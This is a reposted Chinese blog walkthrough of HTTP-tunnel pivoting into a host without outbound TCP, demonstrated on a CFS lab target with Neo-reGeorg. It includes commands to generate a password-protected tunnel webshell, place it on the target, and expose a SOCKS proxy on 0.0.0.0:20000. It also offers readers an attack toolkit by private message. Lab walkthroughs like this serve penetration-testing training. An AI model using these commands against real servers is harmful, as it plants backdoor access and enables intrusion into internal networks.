您的位置:首页 > 科技 > 能源 > 针对tcp不出网打——HTTP封装隧道代理(以CFS演示)

针对tcp不出网打——HTTP封装隧道代理(以CFS演示)

2024/10/7 2:24:19 来源:https://blog.csdn.net/weixin_74171325/article/details/140246235  浏览:    关键词:针对tcp不出网打——HTTP封装隧道代理(以CFS演示)

目录

上传工具到攻击机 

使用说明

生成后门文件 

由于电脑短路无法拖动文件,我就wget发送到目标主机tunnel.php文件​

成功上传​

可以访问上传的文件

启动代理监听

成功带出


后台私信获取弹药库工具reGeorg

上传工具到攻击机 

使用说明

生成后门文件 

python3 neoreg.py generate -k crazy #-k crazy 设置密码为crazy

 成功上传

可以访问上传的文件

启动代理监听

python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy 
python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy -l 0.0.0.0 -p 20000  #-l 0.0.0.0设置监听地址 -p 20000设置监听端口    注意:不要忘记proxychains的修改

 可以看到初始是监听127.0.0.1:1080,我们选择改监听地址和端口带出到我们物理机

python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy -l 0.0.0.0 -p 20000

 成功带出

 配置kali代理,kali也可以正常请求到

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com